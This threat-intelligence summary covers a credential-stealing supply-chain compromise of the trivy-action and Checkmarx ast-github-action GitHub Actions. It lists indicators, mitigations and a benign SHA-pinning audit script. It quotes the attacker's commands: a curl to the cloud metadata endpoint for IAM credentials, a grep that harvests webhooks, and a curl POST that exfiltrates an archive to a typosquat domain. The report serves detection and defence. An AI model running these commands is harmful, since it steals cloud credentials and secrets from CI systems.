TeamPCP compromised Aqua Security’s trivy-action and injected a credential-stealing payload that harvested CI runner memory, queried cloud instance metadata, enumerated webhook URLs, and exfiltrated encrypted secrets to typosquat domains. The identical stealer appeared days later in Checkmarx’s ast-github-action (v2.3.28), indicating stolen credentials from the Trivy compromise were used to poison additional GitHub Actions.
Keypoints
- TeamPCP force-pushed malicious commits to aquasecurity/trivy-action tags, causing compromised action code to execute in thousands of CI workflows.
- The malicious payload scraped Runner.Worker memory for secrets, queried the EC2 IMDS for IAM credentials, searched workspaces for Slack/Discord webhooks, and packaged findings into an AES-256+RSA-4096 encrypted tpcp.tar.gz for exfiltration.
- Approximately four days after the Trivy compromise, an identical stealer executed via Checkmarx/ast-github-action (v2.3.28), uploading tpcp.tar.gz to a Checkmarx-typosquat domain (checkmarx[.]zone), showing credential reuse and cascading supply-chain poisoning.
- Exfiltration used vendor-specific typosquat domains (scan.aquasecurtiy[.]org and checkmarx[.]zone), which resolved to 45.148.10.212 and 83.142.209.11 respectively, to disguise traffic as vendor-related activity in CI logs.
- Static controls and dependency scans failed because trusted action tags were subverted by force-pushes; runtime detection (Sysdig Secure / Falco) succeeded by detecting IMDS access correlated with subsequent binary uploads from the same process lineage.
- Mitigations include rotating all exposed secrets, auditing CI logs for tpcp.tar.gz and typosquat domains, pinning actions to commit SHAs, restricting IMDS access or enforcing IMDSv2, and enabling runtime monitoring of CI runners.
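
The pinning mitigation in the last keypoint can be checked mechanically. The audit below is an added example, not code from the original report or from either vendor: it flags "uses:" references that are not pinned to a full 40-character commit SHA and marks the two actions named on this page. The sample workflow, the example-org/deploy-action name and the SHA in it are constructed.

```python
import re

# Actions named on this page as compromised (compared case-insensitively).
AFFECTED = {"aquasecurity/trivy-action", "checkmarx/ast-github-action"}
FULL_SHA = re.compile(r"[0-9a-f]{40}")
USES = re.compile(r"""^\s*(?:-\s*)?uses:\s*["']?([^\s"'#]+)""")


def audit_workflow(text):
    """Return (line_no, reference, finding) for each risky `uses:` entry."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        m = USES.match(line)
        if not m:
            continue
        ref = m.group(1)
        # Local actions and container images are not resolved through git tags.
        if ref.startswith(("./", "docker://")):
            continue
        action, _, version = ref.partition("@")
        # owner/repo/subdir@ref: only owner/repo identifies the repository.
        repo = "/".join(action.split("/")[:2]).lower()
        # Tags, branches and abbreviated SHAs are all treated as movable refs.
        pinned = bool(FULL_SHA.fullmatch(version.lower()))
        if repo in AFFECTED:
            kind = "affected-pinned-verify-sha" if pinned else "affected-mutable-ref"
        elif not pinned:
            kind = "mutable-ref"
        else:
            continue
        findings.append((no, ref, kind))
    return findings


# Constructed sample workflow (not taken from any real repository).
SAMPLE = """\
jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@0123456789abcdef0123456789abcdef01234567
      - uses: aquasecurity/trivy-action@master
      - uses: "Checkmarx/ast-github-action@v2.3.28"  # tag, can be moved
      - name: local helper
        uses: ./.github/actions/build
      - uses: example-org/deploy-action@1a2b3c4
"""

if __name__ == "__main__":
    for no, ref, kind in audit_workflow(SAMPLE):
        print(f"line {no}: {ref}: {kind}")
```

A reference reported as affected-pinned-verify-sha still needs its SHA compared against a commit known to be clean, since this page does not list the malicious commit hashes.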
MITRE Techniques
- [T1552.005] Unsecured Credentials: Cloud Instance Metadata API – The stealer queried the IMDS to retrieve temporary IAM credentials, enabling cloud access from the runner ('curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/').
- [T1102] Web Service – The actor enumerated webhook URLs in the workspace for collection and potential secondary exfiltration ('grep -r "hooks.slack.com|discord.com/api/webhooks" . 2>/dev/null | head -20').
Indicators of Compromise
- [Domain] Exfiltration typosquat domains – scan.aquasecurtiy[.]org, checkmarx[.]zone
- [IP Address] Resolved exfiltration destinations – 45.148.10.212 (scan.aquasecurtiy[.]org), 83.142.209.11 (checkmarx[.]zone)
- [Filename] Payload filename used for exfiltration – tpcp.tar.gz
- [GitHub Action] Compromised actions and versions – aquasecurity/trivy-action (75 of 76 tags force-pushed), Checkmarx/ast-github-action (v2.3.28)
- [Repository name] Fallback exfiltration indicator – tpcp-docs (creation in victim GitHub accounts signals successful fallback exfiltration)
- [Command/URL pattern] Exfiltration and IMDS access commands observed – 'curl -s -o /dev/null -w %{http_code} -X POST https://checkmarx[.]zone … --data-binary @/tmp/…/tpcp.tar.gz', 'http://169.254.169.254/latest/meta-data/iam/security-credentials/'